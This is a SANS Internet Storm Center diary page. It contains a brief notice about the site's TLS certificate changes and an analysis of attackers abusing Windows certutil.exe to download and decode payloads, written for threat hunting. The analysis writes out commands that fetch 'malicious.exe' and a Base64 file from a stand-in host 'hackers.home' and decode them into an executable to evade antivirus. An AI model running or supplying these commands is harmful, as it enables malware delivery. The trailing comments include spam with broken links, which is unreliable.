ISC/DShield Website TLS Updates
On Thursday, we will change our TLS certificate to one issued by Letsencrypt. In the past, we used normal "commercial" certificates. Until a few months ago, we used HTTP Public Key Pinning. It appears that key pinning is no longer going to be supported by browsers, so we decided to remove this feature, which enabled us to use Letsencrypt. We removed the key pinning header a while ago, and browsers should no longer "pin" for our sites. But in case you are experiencing problems connecting to this site later this week, please let us know. You may still be able to connect to www.dshield.org if you can not connect to isc.sans.edu.
We will also make another attempt to turn off TLS 1.0 support. While strictly speaking not a big risk to our site, we try to follow best practices. In the past, we had issues with some podcast players. But the service hosting our podcast MP3s has already turned off TLS 1.0, so this should not be an issue anymore. Again: Please report errors.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|
A Suspicious Use of certutil.exe
The Microsoft operating system is full of command line tools that help to perform administrative tasks. Some can be easily installed, like the SysInternal suite[1] and psexec.exe, others are builtin in Windows and available to everybody. The presence of calls to such tools can help to detect suspicious behaviours. Why reinvent the wheel, if a tool can achieve what you need? I recently upgraded my hunting rules on VirusTotal to collect samples that are (ab)using the "certutil.exe" tool. The purpose of this tool is to dump and display certification authority (CA) information, manage certificates and keys. This is a command line tool that accepts a lot of parameters [2]. A classic use of certutil.exe is to easily process Base64 encoded data:
C:\Temp> certutil.exe -decode input.txt output.exe
But, it is possible to use the tool to perform an important task for attackers: To fetch data from the Internet! Indeed, many Microsoft tools are able to fetch an online file using a URL schema (ftp://, http://, etc). I presume you already know that, in every dialogue box used to open/save a file, you can provide a URL:
It is exactly the same with certutil.exe which can fetch data from the Internet. I spotted a script which uses it in this way. Here is an example of download:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe **** Online **** 000000 ... 1056d0 CertUtil: -URLCache command completed successfully.
Interesting, the tool makes two connections to the remote web server using two different User-Agents. Here is an extract from the web server logs:
10.x.x.x - - [03/Apr/2018:21:21:11 +0200] "GET /malicious.exe HTTP/1.1" 200 1077596 "-" "Microsoft-CryptoAPI/10.0" 10.x.x.x - - [03/Apr/2018:21:21:15 +0200] "GET /malicious.exe HTTP/1.1" 200 1077540 "-" "CertUtil URL Agent”
What about the command line options?
- "-urlcache" is used to perform URL cache management action.
- "-f" is used to force fetching the specified URL and updating the cache.
- "-split" is used to dump the file on disk.
Let's combine the two features: grab a Base64 encoded text file to bypass AV & proxies and decode it to easily drop a malicious exec on your target:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe
So, no need to install a curl or wget, certutil.exe is available for this basic feature!
[1] https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
[2] https://ss64.com/nt/certutil.html
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago